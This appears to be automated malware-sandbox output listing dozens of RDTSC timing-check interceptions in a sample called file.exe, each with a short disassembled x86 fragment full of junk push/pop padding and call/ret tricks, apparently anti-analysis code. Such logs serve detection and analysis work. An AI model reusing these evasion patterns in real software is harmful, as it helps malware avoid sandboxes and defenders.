Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18341 second address: B18348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18348 second address: B183AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0AD8C6A9B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jg 00007F0AD8C6A9BCh 0x0000002a push 00000004h 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D27B2h], edi 0x00000033 mov ax, di 0x00000036 popad 0x00000037 nop 0x00000038 jnp 00007F0AD8C6A9C8h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jnc 00007F0AD8C6A9B6h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18A45 second address: B18A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18A4A second address: B18A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18AC7 second address: B18ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18ACB second address: B18AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18AD1 second address: B18B3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jns 00007F0AD95F882Ch 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jng 00007F0AD95F8826h 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F0AD95F8828h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 jg 00007F0AD95F882Ch 0x0000003c mov dword ptr [ebp+122D1B38h], ecx 0x00000042 lea eax, dword ptr [ebp+1247D54Ch] 0x00000048 mov edi, 5DFB78C1h 0x0000004d nop 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007F0AD95F8826h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18B3D second address: B18B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18B53 second address: B18B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18B5A second address: B18BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0AD8C6A9B8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov di, EE3Dh 0x00000027 or dword ptr [ebp+122D37E6h], esi 0x0000002d lea eax, dword ptr [ebp+1247D508h] 0x00000033 jbe 00007F0AD8C6A9B9h 0x00000039 mov cx, bx 0x0000003c mov edx, 3BB5A890h 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 push edi 0x00000045 jmp 00007F0AD8C6A9C4h 0x0000004a pop edi 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18BBA second address: B18BBF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B551E6 second address: B551EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B55866 second address: B5587C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Dh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A091 second address: B5A0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0AD8C6A9B6h 0x0000000a pop ecx 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F0AD8C6A9B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A0AB second address: B5A0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A0AF second address: B5A0B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5A7DB second address: B5A7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5AC6F second address: B5AC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5ADCD second address: B5ADD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5B092 second address: B5B0A6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0AD8C6A9B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0AD8C6A9B6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B60474 second address: B60478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5FFFA second address: B6000F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0AD8C6A9BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6000F second address: B60014 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B654A5 second address: B654A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B654A9 second address: B654BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 js 00007F0AD95F8826h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B654BF second address: B654C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B65648 second address: B65652 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B65652 second address: B65658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B65658 second address: B6565C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6565C second address: B65667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B657CF second address: B657D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B69F02 second address: B69F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B69F06 second address: B69F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8835h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A251 second address: B6A25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A6AF second address: B6A6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A6B3 second address: B6A6BD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A6BD second address: B6A6E3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F882Ch 0x00000008 push ebx 0x00000009 ja 00007F0AD95F8826h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0AD95F882Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6A9BE second address: B6A9DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F0AD8C6A9B6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0AD8C6A9C0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E554 second address: B6E56E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0AD95F882Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DDDC second address: B6DE00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0AD8C6A9B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0AD8C6A9C3h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E242 second address: B6E254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0AD95F882Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73851 second address: B73883 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0AD8C6A9C0h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0AD8C6A9C6h 0x00000010 ja 00007F0AD8C6A9B6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B739D1 second address: B739D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73C83 second address: B73CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C1h 0x00000007 jns 00007F0AD8C6A9B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0AD8C6A9C5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73CB6 second address: B73CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73CC5 second address: B73CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B745A5 second address: B745AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD95F8832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B745AF second address: B745B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B74B96 second address: B74B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B74B9B second address: B74BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0AD8C6A9C2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B74BB4 second address: B74BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F0AD95F8832h 0x0000000b jns 00007F0AD95F8826h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B753EA second address: B75406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD8C6A9C0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75406 second address: B7540D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7540D second address: B75456 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0AD8C6A9C9h 0x00000008 push ebx 0x00000009 jmp 00007F0AD8C6A9C8h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0AD8C6A9D2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0AD8C6A9BAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75456 second address: B75460 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B791B7 second address: B791BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B79A6A second address: B79A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B79D20 second address: B79D51 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F0AD8C6A9C2h 0x00000010 jmp 00007F0AD8C6A9BEh 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84793 second address: B847AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD95F8833h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84A9B second address: B84AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F0AD8C6A9BAh 0x0000000b je 00007F0AD8C6A9BCh 0x00000011 js 00007F0AD8C6A9B6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0AD8C6A9BFh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84AC8 second address: B84AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0AD95F8826h 0x00000009 jne 00007F0AD95F8826h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85459 second address: B8545E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8545E second address: B85479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0AD95F8836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85479 second address: B8548D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F0AD8C6A9B8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8548D second address: B854CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0AD95F882Ah 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F0AD95F8837h 0x00000012 jmp 00007F0AD95F8834h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B854CB second address: B854D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85BDF second address: B85BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85BE3 second address: B85BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85BE9 second address: B85BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85BEF second address: B85BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85BF3 second address: B85C2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0AD95F8834h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0AD95F8830h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B85C2E second address: B85C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8AB59 second address: B8AB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0AD95F8833h 0x0000000c jp 00007F0AD95F8826h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E9D3 second address: B8EA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0AD8C6A9C9h 0x00000008 jns 00007F0AD8C6A9B6h 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0AD8C6A9BAh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE292C second address: AE2932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE2932 second address: AE2937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE2937 second address: AE296B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0AD95F8832h 0x00000008 jmp 00007F0AD95F8839h 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E3DE second address: B8E3F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9BFh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E3F4 second address: B8E403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F0AD95F8826h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E403 second address: B8E444 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F0AD8C6A9C9h 0x00000018 jmp 00007F0AD8C6A9C4h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E444 second address: B8E44A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E44A second address: B8E44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9238B second address: B923A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jp 00007F0AD95F8826h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C830 second address: B9C834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C834 second address: B9C858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0AD95F882Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C858 second address: B9C85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C3DF second address: B9C3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C3E5 second address: B9C3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C3EB second address: B9C3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9FE85 second address: B9FE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9FE90 second address: B9FEC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0AD95F8834h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F9F7 second address: B9F9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB1525 second address: BB152B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB398E second address: BB3992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
